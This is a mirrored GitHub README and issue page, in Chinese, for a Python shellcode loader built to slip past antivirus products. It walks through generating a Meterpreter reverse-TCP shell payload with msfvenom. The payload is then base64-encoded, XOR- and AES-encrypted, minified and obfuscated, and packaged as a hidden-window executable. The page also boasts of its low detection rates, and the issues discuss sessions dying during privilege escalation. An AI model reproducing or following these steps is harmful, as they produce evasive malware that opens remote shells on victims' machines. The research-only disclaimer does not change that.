Giter Site home page Giter Site logo

python-shellcode-loader's Introduction

python-shellcode-loader

简单介绍

免杀方式 msfvenom生成raw格式的shellcode-->base64-->XOR-->AES
将python代码缩小并混淆最后生成exe
目前过DF、360和火绒 virustotal:7/66过卡巴斯基、迈克菲等

获取项目

git clone https://github.com/HZzz2/python-shellcode-loader.git

cd python-shellcode-loader

pip install -r .\requirements.txt

生成shellcode

#生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=9999 -f raw > rev.raw

base64编码shellcode并替换jiami.py中的值

#base64
base64 -w 0 -i rev.raw > rev.bs64
cat rev.bs64
复制base64的值替换jiami.py中payload 也就是 第二十四行 sc='payload'

加密base64并替换main.py中的值

#加密base64后的shellcode
python3 jiami.py
#会生成一个aes-xor.txt的文件,复制文件里的值(经过XOR和AES加密后)
复制的值替换main.py中的payload 也就是第四十一行 jiami_sc='payload'

缩小和混淆py代码

缩小python代码

pyminify main.py --output main-mini.py

混淆main-mini.py中的python代码

https://pyob.oxyry.com/ 在线混淆
image.png
将混淆后的代码保存到一个文件中,比如文件名为:main-mini-ob.py

打包成可执行文件exe

#打包成exe
pyinstaller.exe -Fw -i .\setting.ico --key=leslie .\main-mini-ob.py
-F 打包为单文件 -w 不显示窗口 -i ico图标文件 --key 加密字节码的密钥
等待打包完成。。。。
打包好后的可执行程序在dist目录中

流程图

检测图

DF

image

火狐

image

360杀毒

image

360安全卫士云查杀

image

virustotal

image

run.mp4

免责声明

仅供安全研究与教学之用,如果使用者将其做其他用途,由使用者承担全部法律及连带责任,本人不承担任何法律及连带责任。

python-shellcode-loader's People

Contributors

hzzz2 avatar

Stargazers

avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar avatar

Watchers

avatar avatar

Forkers

zzhsec lay0us 1363389144 akunwin kagantua jiecoll leviclapham hxzzy60 ykwiss ling1uan yukar1z0e degvint fleabane1 1203731177 lighthouse-951 schira4396 fengzihk a-new h1ck0r youcango popiano123 xinghe0 woozz2 gitgcccreate hytirrbaixi lastnameradeon

python-shellcode-loader's Issues

测试df

静态可以过 文件管理也没问题 执行命令就杀了

session打开后立马关闭

报错信息如下:
[] Sending stage (175174 bytes) to 192.168.59.1
[] - Meterpreter session 8 closed. Reason: Died
[-] Meterpreter session 8 is not valid and will be closed

cs执行敏感操作 会被杀

cs执行下载文件、结束进程等是正常的,一提权、截图等就被杀了
loader没事,不会被删,是什么原因呢

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.